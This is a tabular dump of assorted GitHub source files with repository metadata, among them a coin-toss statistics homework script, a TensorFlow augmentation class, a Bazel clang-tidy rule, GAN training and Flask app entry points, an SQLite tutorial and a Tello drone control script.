max_stars_repo_path (string, 4-182 chars) | max_stars_repo_name (string, 6-116 chars) | max_stars_count (int64, 0-191k) | id (string, 7 chars) | content (string, 100-10k chars) | size (int64, 100-10k) |
---|---|---|---|---|---|
Problem 1/prob1.py | paul028/Machine-Problem-1 | 0 | 2172696 |
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 18:15:13 2019
@author: <NAME>
Student Number: 2018-21366
EE 214 MP #1
"""
from statistics import mean
import numpy as np
import matplotlib.pyplot as plt
#function to toss a coin
def toss_coin():
coin=np.random.randint(2)
#use randint function to simulate coin flip
#toss coin returns 1 for heads, 0 for tails
return coin;
def experiment(x,no_toss):
#Fair coin is tossed no_toss times according to the problem,
no_heads=0
no_tails=0
result=np.zeros(no_toss)
print("Tossing Coins 100 Times Trial:"+ str(x+1))
for x in range(0,no_toss):
#simulate coin toss 100 times
result[x]=toss_coin()
for i in result:
#count the number of heads and tails
if i ==1:
no_heads = no_heads+1
if i==0:
no_tails = no_tails+1
return no_heads,no_tails;
def sum_of_3Sk(i,j,k):
sum_3sk = S_heads[i-1]+S_heads[j-1]+S_heads[k-1]
return sum_3sk;
print("Begin Experiment")
no_toss=100 # Set the number of coin toss
no_repetition=1000 #Set the number of experiment repetition
# array for number of heads per experiment
heads_pr=np.zeros(no_repetition)
# array for number of tails per experiment
tails_pr=np.zeros(no_repetition)
for x in range(0,no_repetition): # repeat the experiment 1000 times
heads_pr[x],tails_pr[x] =experiment(x,no_toss)
#returns the number of heads and tails per repetition
S_heads=np.zeros(no_toss)
#Array for storing number of heads per trial
for S_k in range(0,no_toss):
#Calculate how many trials yield n no of heads,
    #where the maximum possible number of heads per trial is 100
#since there is 100 toss per trial
for n in range(0,no_repetition) :
if heads_pr[n]==S_k+1:
S_heads[S_k] = S_heads[S_k]+1
#count the number of trials with S_K+1 heads
c=33
a1=np.zeros(12)
ave1=np.zeros(12)
i=0
for x in range(0,36,3):
a1[i]= sum_of_3Sk(c+x,c+x+1,c+x+2)
ave1[i]= mean([c+x,c+x+1,c+x+2])
print('N_1000(S_%d) + N_1000(S_%d) + N_1000(S_%d) = %d'
% (c+x,c+x+1,c+x+2,a1[i]))
i=i+1
# Plot the bar graph
plot = plt.bar(ave1,a1)
# Add the data value on head of the bar
for value in plot:
height = value.get_height()
plt.text(value.get_x() + value.get_width()/2.,
1.002*height,'%d' % int(height), ha='center', va='bottom')
# Add labels and title
plt.title("Average Number of Heads vs k")
plt.xlabel("Average Number of Heads")
plt.ylabel("k")
plt.savefig('result1.1.png')
# Display the graph on the screen
plt.show()
#1.3 -Probability, Expected value,
print("Calculate probability for 20 trials")
p=np.zeros(20)
E_X=np.zeros(20)
std_X=np.zeros(20)
print("p E(X) STD")
for i in range(20):
p[i]=heads_pr[i]/no_toss
E_X[i]=no_toss*p[i]
    std_X[i]=np.sqrt(no_toss*p[i]*(1-p[i]))  # binomial std uses the number of tosses, not the leftover loop index n
print(str(p[i])+" "+str(E_X[i])+" "+str(std_X[i]))
| 2,934 |
tf_sprinkles/sprinkles.py | Engineero/sprinkles | 8 | 2171375 |
"""Progressive Sprinkles implementation in TensorFlow.
Original code based on Stack Overflow question by <NAME>.
https://stackoverflow.com/questions/60567071/efficient-progressive-sprinkles-augmentation-in-tensorflow
"""
import tensorflow as tf
class Sprinkles:
    """Progressive Sprinkles Augmentation.
Args:
num_holes: number of holes to make in an image
        side_length: length of the sides each hole will have.
Keyword Args:
mode: one of [None, 'gaussian', 'salt_pepper']. If None, all sprinkles
will be black. If 'gaussian', sprinkles will be filled with
Gaussian noise. If 'salt_pepper', sprinkles will be randomly
black or white. Default is None.
Returns:
Image with number of holes of specified size cut out.
"""
def __init__(self, num_holes, side_length, mode=None):
        if mode == 'salt_pepper':  # compare strings with ==, not identity
self.n = num_holes // 2
else:
self.n = num_holes
self.length = side_length
self.mode = mode
def __call__(self, image):
"""Apply sprinkles to an image.
Args:
image: image (preferably tf.float32) to be sprinkled.
Returns:
Image with sprinkles applied.
Raises:
ValueError: if `mode` is not one of the allowed modes or None.
"""
        image = tf.cast(image, tf.float32)  # keep the cast result
img_shape = tf.shape(image)
if self.mode is None:
rejected = tf.zeros_like(image)
        elif self.mode == 'gaussian':
rejected = tf.random.normal(img_shape, dtype=tf.float32)
        elif self.mode == 'salt_pepper':
rejected_high = tf.ones_like(image)
rejected_low = tf.zeros_like(image)
else:
raise ValueError(f'Unknown mode "{self.mode}" given.')
rows = img_shape[0]
cols = img_shape[1]
num_channels = img_shape[-1]
        if self.mode == 'salt_pepper':
mask1 = self._make_mask(rows, cols, num_channels)
mask2 = self._make_mask(rows, cols, num_channels)
filtered_image = tf.where(mask1, rejected_high, image)
filtered_image = tf.where(mask2, rejected_low, filtered_image)
else:
mask = self._make_mask(rows, cols, num_channels)
filtered_image = tf.where(mask, rejected, image)
return filtered_image
def _make_mask(self, rows, cols, num_channels):
"""Builds the mask for all sprinkles."""
row_range = tf.tile(tf.range(rows)[..., tf.newaxis], [1, self.n])
col_range = tf.tile(tf.range(cols)[..., tf.newaxis], [1, self.n])
r_idx = tf.random.uniform([self.n], minval=0, maxval=rows-1,
dtype=tf.int32)
c_idx = tf.random.uniform([self.n], minval=0, maxval=cols-1,
dtype=tf.int32)
r1 = tf.clip_by_value(r_idx - self.length // 2, 0, rows)
r2 = tf.clip_by_value(r_idx + self.length // 2, 0, rows)
c1 = tf.clip_by_value(c_idx - self.length // 2, 0, cols)
c2 = tf.clip_by_value(c_idx + self.length // 2, 0, cols)
row_mask = (row_range > r1) & (row_range < r2)
col_mask = (col_range > c1) & (col_range < c2)
# Combine masks into one layer and duplicate over channels.
mask = row_mask[:, tf.newaxis] & col_mask
mask = tf.reduce_any(mask, axis=-1)
mask = mask[..., tf.newaxis]
mask = tf.tile(mask, [1, 1, num_channels])
return mask
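# --- Illustrative usage (a sketch added for clarity, not part of the original
# module; the tensor shape and parameter values below are assumptions) ---
if __name__ == '__main__':
    example_image = tf.random.uniform([64, 64, 3], dtype=tf.float32)
    sprinkles = Sprinkles(num_holes=8, side_length=6, mode='gaussian')
    augmented = sprinkles(example_image)
    print(augmented.shape)  # expected: (64, 64, 3)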
| 3,522 |
PGCAltas/apps/gsedata/url.py | IzayoiRin/PGCAltas | 0 | 2173175 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r"^features/$", views.FeaturesScreenAPIView.as_view())
]
| 137 |
apps/feedback/unittests/factories.py | lsdlab/djshop_toturial | 0 | 2172464 |
import factory
from faker import Faker
fake = Faker("zh_CN")
class FeedbackFactory(factory.django.DjangoModelFactory):
class Meta:
model = 'feedback.Feedback'
django_get_or_create = ('id', )
type = factory.Iterator(['1', '2', '3', '4'])
content = fake.text()
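# Illustrative usage (a sketch; assumes Django is configured and the feedback app is installed):
#     feedback = FeedbackFactory(id=1)  # get-or-create a Feedback row with a random type and fake text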
| 290 |
clang-tidy.bzl | xiay-nv/bazel-compilation-database | 0 | 2173080 |
# Copyright 2020 NVIDIA, Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load(":aspects.bzl", "compilation_database_aspect")
_clang_tidy_script = """\
#!/bin/bash
pwd
cmd="ln -sf {compdb_file} compile_commands.json"
echo $cmd
eval $cmd
cmd="clang-tidy {options} $@ {sources}"
echo $cmd
eval $cmd
"""
def _clang_tidy_check_impl(ctx):
compdb_file = ctx.attr.src[OutputGroupInfo].compdb_file.to_list()[0]
src_files = ctx.attr.src[OutputGroupInfo].source_files.to_list()
hdr_files = ctx.attr.src[OutputGroupInfo].header_files.to_list()
if len(src_files) == 0:
if ctx.attr.mandatory:
fail("`src` must be a target with at least one source or header.")
else:
test_script = ctx.actions.declare_file(ctx.attr.name + ".sh")
ctx.actions.write(output = test_script, content = "#noop", is_executable = True)
return DefaultInfo(executable = test_script)
sources = " ".join([ src.short_path for src in src_files ])
build_path = compdb_file.dirname.replace(compdb_file.root.path + "/", "")
options = " ".join(ctx.attr.options)
content = _clang_tidy_script.format(
compdb_file = compdb_file.short_path,
build_path = build_path,
sources = sources,
options = options,
)
test_script = ctx.actions.declare_file(ctx.attr.name + ".sh")
ctx.actions.write(output = test_script, content = content, is_executable = True)
runfiles = src_files + hdr_files + [compdb_file]
if ctx.attr.config != None:
files = ctx.attr.config.files.to_list()
if len(files) != 1:
fail("`config` attribute in rule `clang_tidy_test` must be single file/target")
runfiles.append(files[0])
return DefaultInfo(
files = depset([test_script, compdb_file]),
runfiles = ctx.runfiles(files = runfiles),
executable = test_script,
)
clang_tidy_test = rule(
attrs = {
"src": attr.label(
aspects = [compilation_database_aspect],
doc = "Source target to run clang-tidy on.",
),
"mandatory": attr.bool(
default = False,
doc = "Throw error if `src` is not eligible for linter check, e.g. have no C/C++ source or header.",
),
"config": attr.label(
doc = "Clang tidy configuration file",
allow_single_file = True,
),
"options": attr.string_list(
doc = "options given to clang-tidy",
)
},
test = True,
implementation = _clang_tidy_check_impl,
)
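# Illustrative BUILD usage (a sketch; the load path and target names below are
# assumptions, not part of this file):
#
#     load("//:clang_tidy.bzl", "clang_tidy_test")
#
#     clang_tidy_test(
#         name = "mylib_clang_tidy",
#         src = ":mylib",
#         config = ":.clang-tidy",
#         options = ["--warnings-as-errors=*"],
#     )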
| 3,073 |
baseline/__about__.py | dmgass/baseline | 2 | 2171860 |
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Copyright 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
__all__ = ('__title__', '__summary__', '__uri__', '__version_info__',
'__version__', '__author__', '__maintainer__', '__email__',
'__copyright__', '__license__')
__title__ = "baseline"
__summary__ = "Easy string baseline."
__uri__ = "https://github.com/dmgass/baseline"
__version_info__ = type("version_info", (), dict(serial=0,
major=1, minor=2, micro=1, releaselevel="final"))
__version__ = "{0.major}.{0.minor}.{0.micro}{1}{2}".format(__version_info__,
dict(final="", alpha="a", beta="b", rc="rc")[__version_info__.releaselevel],
"" if __version_info__.releaselevel == "final" else __version_info__.serial)
__author__ = "<NAME>"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__copyright__ = "Copyright 2020 <NAME>"
__license__ = "MIT License ; http://opensource.org/licenses/MIT"
| 2,161 |
modules/__init__.py | sloth2012/ner-bert | 6 | 2172247 |
from .train.train import NerLearner
from .data.bert_data import BertNerData
from .models.bert_models import BertBiLSTMCRF
__all__ = ["NerLearner", "BertNerData", "BertBiLSTMCRF"]
| 181 |
train.py | urtrial/generative-models-collection | 30 | 2172531 |
import os, sys
import argparse
import torch
import visdom
from lib.utils import CroppedCelebA
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--type', type=str, default='BEGAN',
choices=['VAE', 'DCGAN', 'VAEGAN', 'LSGAN', 'WGAN', 'WGANGP', "InfoGAN", 'BEGAN'],
help='The type of GAN: VAE, DCGAN, VAEGAN, LSGAN, WGAN, WGANGP, InfoGAN, BEGAN')
parser.add_argument('--n_epochs', type=int, default=50, help='The number of epochs to run')
parser.add_argument('--start_epoch', type=int, default=0, help='Epoch of preloaded model')
parser.add_argument('--batch_size', type=int, default=128, help='Training batch size')
parser.add_argument('--lr', type=float, default=0.0001, help='Training learning rate')
parser.add_argument('--beta1', type=float, default=0.5, help='Adam beta1')
parser.add_argument('--beta2', type=float, default=0.999, help='Adam beta2')
parser.add_argument('--n_fil', type=int, default=128, help='Min number of filters of conv/deconv layers')
parser.add_argument('--z_dim', type=int, default=88, help='Dimension of latent space')
parser.add_argument('--n_critic', type=int, default=5,
                        help='Number of discriminator steps per generator step. Applicable for Wasserstein models')
parser.add_argument('--n_gen', type=int, default=1,
                        help='Number of generator steps per discriminator step. Applicable for non-Wasserstein models')
parser.add_argument('--use_visdom', type=bool, default=True, help='Use Visdom')
parser.add_argument('--visdom_host', type=str, default='http://localhost', help='Visdom host')
parser.add_argument('--visdom_port', type=int, default=8889, help='Visdom port')
parser.add_argument('--visdom_env', type=str, default='main', help='Visdom environment')
parser.add_argument('--plot_freq', type=int, default=100, help='Visdom plotting frequency')
parser.add_argument('--preload_model', type=bool, default=False,
help='Continue training from the model specified by load_dir and start_epoch')
parser.add_argument('--load_dir', type=str, default='models',
help='Parent directory path to preload the model from')
parser.add_argument('--save_dir', type=str, default='models', help='Parent directory path to save the model')
parser.add_argument('--chkp_freq', type=int, default=20, help='Model checkpoint frequency')
parser.add_argument('--imgs_dir', type=str, default='results',
help='Parent directory path to save the generated images')
return parser.parse_args()
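# Illustrative invocation (a sketch; flag values are arbitrary examples):
#     python train.py --type WGANGP --n_epochs 100 --batch_size 64 --z_dim 88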
if __name__ == "__main__":
args = parse_args()
torch.manual_seed(43)
if args.type == "VAE":
from lib.models.VAE import VAE
Model = VAE
elif args.type == "VAEGAN":
from lib.models.VAEGAN import VAEGAN
Model = VAEGAN
elif args.type == "DCGAN":
from lib.models.DCGAN import DCGAN
Model = DCGAN
elif args.type == "LSGAN":
from lib.models.LSGAN import LSGAN
Model = LSGAN
elif args.type == "WGAN":
from lib.models.WGAN import WGAN
Model = WGAN
elif args.type == "WGANGP":
from lib.models.WGANGP import WGANGP
Model = WGANGP
elif args.type == "InfoGAN":
from lib.models.InfoGAN import InfoGAN
Model = InfoGAN
elif args.type == "BEGAN":
from lib.models.BEGAN import BEGAN
Model = BEGAN
else:
print("Wrong GAN type provided")
sys.exit()
celeba_data = CroppedCelebA("./data")
n_attrs = 40
# enforce directories existence
imgs_dir = os.path.join(args.imgs_dir, args.type)
if not os.path.exists(imgs_dir):
os.makedirs(imgs_dir)
save_dir = os.path.join(args.save_dir, args.type)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
load_dir = os.path.join(args.load_dir, args.type)
if args.use_visdom:
viz = visdom.Visdom(server=args.visdom_host, port=args.visdom_port, env=args.visdom_env)
else:
viz = None
model = Model(args.n_fil, args.z_dim, n_attrs, viz).cuda()
model.init_optimizers(args.lr, args.beta1, args.beta2)
model.n_gen = args.n_gen
model.n_critic = args.n_critic
if args.preload_model:
model.load(load_dir, args.start_epoch-1)
try:
model.train_model(celeba_data, n_epochs=args.n_epochs, batch_size=args.batch_size,
start_epoch=args.start_epoch,
models_dir=save_dir, imgs_dir=imgs_dir,
chkp_freq=args.chkp_freq, plot_freq=args.plot_freq)
except KeyboardInterrupt:
pass
finally:
# doesn't work for now when keyboard interrupted, some problems with file writing
model.save(save_dir)
| 4,894 |
app.py | chidaobanjiu/Flask_Web | 1 | 2169746 |
from flask import Flask
from utils import (
datetimeformat,
abstract,
)
from routes.map import main as map_routes
from routes.blog import main as blog_routes
from routes.todo import main as todo_routes
from routes.admin import main as admin_routes
from routes.index import main as index_routes
from routes.comment import main as comment_routes
app = Flask(__name__)
app.secret_key = 'secret not secret'
app.register_blueprint(map_routes, url_prefix='/map')
app.register_blueprint(blog_routes, url_prefix='/blog')
app.register_blueprint(todo_routes, url_prefix='/todo')
app.register_blueprint(admin_routes, url_prefix='/admin')
app.register_blueprint(comment_routes, url_prefix='/comment')
app.register_blueprint(index_routes)
app.jinja_env.filters['datetime'] = datetimeformat
app.jinja_env.filters['abstract'] = abstract
if __name__ == '__main__':
config = dict(
debug=False,
host='0.0.0.0',
port=2001,
)
app.run(**config)
| 975 |
functions.py | Vitor-Padovani/sqlite-python-tutorial | 0 | 2172730 |
import sqlite3
def line(length):
print('-'*length)
def create_table():
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('''CREATE TABLE people
(first_name TEXT,
last_name TEXT,
age INTEGER)''')
def add_one(fname, lname, age):
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('INSERT INTO people VALUES (?,?,?)', (fname, lname, age))
conn.commit()
conn.close()
def remove(id):
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
    c.execute('DELETE from people WHERE rowid = ?', (id,))  # parameters must be passed as a tuple
conn.commit()
conn.close()
def show_all():
conn = sqlite3.connect('data/database.db')
c = conn.cursor()
c.execute('SELECT rowid, * FROM people')
items = c.fetchall()
print('\nID | Nome | Sobrenome | Idade')
line(42)
for item in items:
#print(f'{item[0]}\t{item[1]}\t{item[2]}\t{item[3]}'.expandtabs(16))
print(f'{item[0]}\t', end='')
print(f'{item[1]}\t'.expandtabs(16), end='')
print(f'{item[2]}\t'.expandtabs(16), end='')
print(f'{item[3]}\t', end='\n')
conn.close()
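# Illustrative session (a sketch; the names and the existing data/ directory are assumptions):
#     create_table()
#     add_one('Ada', 'Lovelace', 36)
#     show_all()
#     remove(1)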
| 1,177 |
playground/lgsvl/executeRandomTests/main.py | TrackerSB/IEEEAITestChallenge2021 | 1 | 2172922 |
from queue import Queue
from lgsvl import Simulator, dreamview
from shapely.geometry import LineString, Point
from shapely.ops import unary_union
sim = None
roads = None
road_points = None
junctions = None
allowed_area = None
entry_segment = None
final_segment = None
ego = None
def calc_allowed_area():
global road_points, entry_segment, final_segment, junctions
r = []
q = Queue()
q.put([entry_segment])
while not q.empty():
s = q.get()
succ = s[-1].link.successor
if succ is None:
continue
if succ.elementType == "junction":
for j in junctions:
if j.id != succ.element_id:
continue
for c in j.connections:
if c.incomingRoad != s[-1].id:
continue
aj = True
sext = s.copy()
sext.append(road_points[c.connectingRoad])
q.put(sext)
elif succ.elementType == "road":
su = road_points[succ.element_id]
sext = s.copy()
sext.append(su)
if su.id == final_segment.id:
r.append(sext)
elif len(sext) <= 123:
q.put(sext)
a = []
for rs in r:
ps = []
for s in rs:
ps.extend([(p.x, p.y) for p in s.interpolated_points])
ls = LineString(ps)
a.append(ls.buffer(5))
return unary_union(a)
def test_oracle():
global ego, allowed_area
return allowed_area.contains(Point(ego.state.position.x, ego.state.position.z))
def _execute_test(connection) -> None:
from common.apollo import connect_to_dreamview
from common.config import SupportedDreamViewCar, SupportedMap, ApolloModule
from common.scene import generate_initial_state, get_entry_final_point, load_ego, load_scene
global sim, roads, junctions, road_points, allowed_area, entry_segment, final_segment, ego
load_scene(sim, SupportedMap.BorregasAve)
entry_segment, entry_estimation, final_segment, final_estimation = get_entry_final_point(roads, connection, 20)
allowed_area = calc_allowed_area()
initial_state = generate_initial_state(entry_estimation)
ego = load_ego(sim, SupportedDreamViewCar.Lincoln2017MKZ, initial_state)
# Connect DreamView
ego.connect_bridge("127.0.0.1", 9090)
dv = dreamview.Connection(sim, ego, "127.0.0.1")
dv.set_hd_map('Borregas Ave')
dv.set_vehicle('Lincoln2017MKZ LGSVL')
modules = [
'Localization',
'Transform',
'Routing',
'Prediction',
'Planning',
'Control'
]
spawns = sim.get_spawn()
destination = spawns[0].destinations[0]
dv.setup_apollo(destination.position.x, destination.position.z, modules)
sim.run(10)
timeout = 10
print("test passed")
def _main() -> None:
from common.geometry import interpolate_roads
from common.open_drive_reader import get_roads_and_junctions
global sim, roads, junctions, road_points
# Parse map roads and junctions
roads, junctions = get_roads_and_junctions("borregasave.xodr")
road_points, _ = interpolate_roads(roads)
# Setup simulation
sim = Simulator()
# Find random position on any junction
for junction in junctions:
for connection in junction.connections:
_execute_test(connection)
if __name__ == "__main__":
_main()
| 3,456 |
src/writers/__init__.py | jwpttcg66/ExcelToTransfer | 1 | 2172466 |
# -*- coding: utf-8 -*-
from .base_writer import BaseWriter
from .lua_writer import LuaWriter
from .py_writer import PyWriter
from .json_writer import JsonWriter
from .java_writer import JavaWriter
| 194 |
dltranz/seq_to_target.py | zergey/pytorch-lifestream | 0 | 2168583 |
import logging
from copy import deepcopy
import pytorch_lightning as pl
import torch
import numpy as np
from pytorch_lightning.metrics.functional.classification import auroc
from dltranz.loss import get_loss, cross_entropy, kl, mape_metric, mse_loss, r_squared
from dltranz.seq_encoder import create_encoder
from dltranz.train import get_optimizer, get_lr_scheduler
from dltranz.models import create_head_layers
from dltranz.trx_encoder import PaddedBatch
from collections import defaultdict
logger = logging.getLogger(__name__)
class EpochAuroc(pl.metrics.Metric):
def __init__(self):
super().__init__(compute_on_step=False)
self.add_state('y_hat', default=[])
self.add_state('y', default=[])
def update(self, y_hat, y):
self.y_hat.append(y_hat)
self.y.append(y)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return auroc(y_hat, y.long())
class DistributionTargets(pl.metrics.Metric):
def __init__(self, col_name):
super().__init__(compute_on_step=False)
self.add_state('y_hat', default=[])
self.add_state('y', default=[])
self.col_name = col_name
self.sign = -1 if self.col_name == 'neg_sum' else 1
def update(self, y_hat, y):
y_hat = y_hat[self.col_name]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
y = torch.tensor(np.array(y[self.col_name].tolist(), dtype='float64'), device=device)
self.y_hat.append(y_hat)
self.y.append(y)
class CrossEntropy(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return cross_entropy(y_hat, y)
class KL(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return kl(y_hat, y)
class MSE(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return mse_loss(y_hat, torch.log(self.sign * y[:, None] + 1))
class MAPE(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return mape_metric(self.sign * torch.exp(y_hat - 1), y[:, None])
class LogAccuracy(pl.metrics.Accuracy):
def __init__(self, **params):
super().__init__(**params)
self.add_state('correct', default=torch.tensor([0.0]))
self.add_state('total', default=torch.tensor([0.0]))
def update(self, preds, target):
if len(preds.shape) == 1:
preds = (preds > 0.5).to(dtype=target.dtype)
else:
preds = torch.argmax(preds, dim=1)
self.correct += torch.sum(preds == target)
self.total += target.numel()
def compute(self):
return self.correct / self.total
class R_squared(DistributionTargets):
def __init__(self, col_name):
super().__init__(col_name)
def compute(self):
y_hat = torch.cat(self.y_hat)
y = torch.cat(self.y)
return r_squared(self.sign * torch.exp(y_hat - 1), y[:, None])
class SequenceToTarget(pl.LightningModule):
def __init__(self, params, pretrained_encoder=None):
super().__init__()
self.train_update_n_steps = params.get('train_update_n_steps', None)
self.metrics_test = defaultdict(list) # here we accumulate metrics on each test end
        self.metrics_train = defaultdict(list)  # here we accumulate metrics on some train batches (called outside)
head_params = dict(params['head_layers']).get('CombinedTargetHeadFromRnn', None)
self.pos, self.neg = (head_params.get('pos', True), head_params.get('neg', True)) if head_params else (0, 0)
self.cols_ix = params.get('columns_ix', {'neg_sum': 0,
'neg_distribution': 1,
'pos_sum': 2,
'pos_distribution': 3})
self.save_hyperparameters('params')
self.loss = get_loss(params)
if pretrained_encoder is not None:
self._seq_encoder = deepcopy(pretrained_encoder)
self._is_pretrained_encoder = True
else:
self._seq_encoder = create_encoder(params, is_reduce_sequence=True)
self._is_pretrained_encoder = False
self._head = create_head_layers(params, self._seq_encoder)
# metrics
d_metrics = {
'auroc': EpochAuroc(),
'accuracy': LogAccuracy(),
'R2n': R_squared('neg_sum'),
'MSEn': MSE('neg_sum'),
'MAPEn': MAPE('neg_sum'),
'R2p': R_squared('pos_sum'),
'MSEp': MSE('pos_sum'),
'MAPEp': MAPE('pos_sum'),
'CEn': CrossEntropy('neg_distribution'),
'CEp': CrossEntropy('pos_distribution'),
'KLn': KL('neg_distribution'),
'KLp': KL('pos_distribution')
}
params_score_metric = params['score_metric']
if type(params_score_metric) is str:
params_score_metric = [params_score_metric]
metric_cls = [(name, d_metrics[name]) for name in params_score_metric]
self.train_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in metric_cls])
self.valid_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in deepcopy(metric_cls)])
self.test_metrics = torch.nn.ModuleDict([(name, mc) for name, mc in deepcopy(metric_cls)])
@property
def seq_encoder(self):
return self._seq_encoder
def forward(self, x):
x = self._seq_encoder(x)
x = self._head(x)
return x
def training_step(self, batch, _):
x, y = batch
y_h = self(x)
loss = self.loss(y_h, y)
self.log('loss', loss)
if isinstance(x, PaddedBatch):
self.log('seq_len', x.seq_lens.float().mean(), prog_bar=True)
if self.train_update_n_steps and self.global_step % self.train_update_n_steps == 0:
for name, mf in self.train_metrics.items():
mf(y_h, y)
return loss
def validation_step(self, batch, _):
x, y = batch
y_h = self(x)
for name, mf in self.valid_metrics.items():
mf(y_h, y)
def validation_epoch_end(self, outputs):
for name, mf in self.valid_metrics.items():
self.log(f'val_{name}', mf.compute(), prog_bar=True)
def test_step(self, batch, _):
x, y = batch
y_h = self(x)
for name, mf in self.test_metrics.items():
mf(y_h, y)
def test_epoch_end(self, outputs):
for name, mf in self.test_metrics.items():
value = mf.compute().item()
self.log(f'test_{name}', value, prog_bar=True)
self.metrics_test[name] += [value]
def configure_optimizers(self):
params = self.hparams.params
if self._is_pretrained_encoder:
optimizer = self.get_pretrained_optimizer()
else:
optimizer = get_optimizer(self, params)
scheduler = get_lr_scheduler(optimizer, params)
return [optimizer], [scheduler]
def get_pretrained_optimizer(self):
params = self.hparams.params
if params['pretrained.lr'] == 'freeze':
self._seq_encoder.freeze()
logger.info('Created optimizer with frozen encoder')
return get_optimizer(self, params)
parameters = [
{'params': self._seq_encoder.parameters(), 'lr': params['pretrained.lr']},
{'params': self._head.parameters(), 'lr': params['train.lr']},
]
logger.info('Created optimizer with two lr groups')
return torch.optim.Adam(parameters, lr=params['train.lr'], weight_decay=params['train.weight_decay'])
| 8,138 |
examples/add_subproject.py | iskunk/hub-rest-api-python | 68 | 2172177 |
#!/usr/bin/env python
import http.client
http.client._MAXHEADERS = 1000
import argparse
import copy
from datetime import datetime
import json
import logging
import sys
import timestring
from blackduck.HubRestApi import HubInstance, object_id
parser = argparse.ArgumentParser("Add a sub-project to a project")
parser.add_argument("parent_project")
parser.add_argument("parent_version")
parser.add_argument("sub_project")
parser.add_argument("sub_version")
args = parser.parse_args()
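# Illustrative invocation (project/version names are placeholders):
#     python add_subproject.py "parent-project" "1.0" "sub-project" "2.0"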
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', stream=sys.stderr, level=logging.DEBUG)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
hub = HubInstance()
parent_project = hub.get_project_version_by_name(args.parent_project, args.parent_version)
sub_project = hub.get_project_version_by_name(args.sub_project, args.sub_version)
hub.add_version_as_component(parent_project, sub_project)
| 959 |
latter found.py | kingRovo/PythonCodingChalenge | 1 | 2172065 |
text = "Updesh yadav from uttar pradesh"  # renamed to avoid shadowing the built-in str
cnt = 0
fn = 'a'
for i in text:
    if i == fn:
        cnt = cnt + 1
print(cnt, "letter(s) found")
| 125 |
simple_takeoff_Key.py | MuAuan/Tello | 3 | 2170925 |
from time import sleep
import tellopy
import cv2
def handler(event, sender, data, **args):
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
print(data)
def test():
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
cv2.imshow('test',frame)
key = cv2.waitKey(1)&0xff
print("key=",key,ord('q'))
if key == ord('q'): #113
#cv2.destroyAllWindows()
break
drone = tellopy.Tello()
#drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.connect()
drone.wait_for_connection(60.0)
drone.takeoff()
while True:
ret, frame = cap.read()
cv2.imshow('test',frame)
key = cv2.waitKey(1)&0xff
#print("key=",key,"up_u=",ord('u'),"down_n=",ord('n'),"left_h=",ord('h'),"right_j=",ord('j'),"finish_f=",ord('f'))
print("key=",key,ord('f'))
if key == ord('n'): #n
drone.down(10)
sleep(5)
elif key==ord('u'): #117: #u
drone.up(10)
sleep(5)
elif key==ord('h'): #104: #h
drone.left(3)
sleep(1)
elif key==ord('j'): #106: #j
drone.right(3)
sleep(1)
elif key==ord('f'): #102: #f
cv2.destroyAllWindows()
break
else:
continue
drone.down(50)
sleep(5)
drone.land()
sleep(5)
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.quit()
if __name__ == '__main__':
test()
| 1,564 |
corehq/util/management/commands/show_celery_workers.py | dimagilg/commcare-hq | 471 | 2173098 |
from django.core.management.base import BaseCommand, CommandError
from corehq.util.celery_utils import get_running_workers
class Command(BaseCommand):
"""
Prints the names of all running celery workers. The timeout is the time in
seconds to wait for the worker to respond to the ping command. If no timeout
is given, a default of 10 seconds is used.
Example usages:
python manage.py show_celery_workers
python manage.py show_celery_workers <timeout>
"""
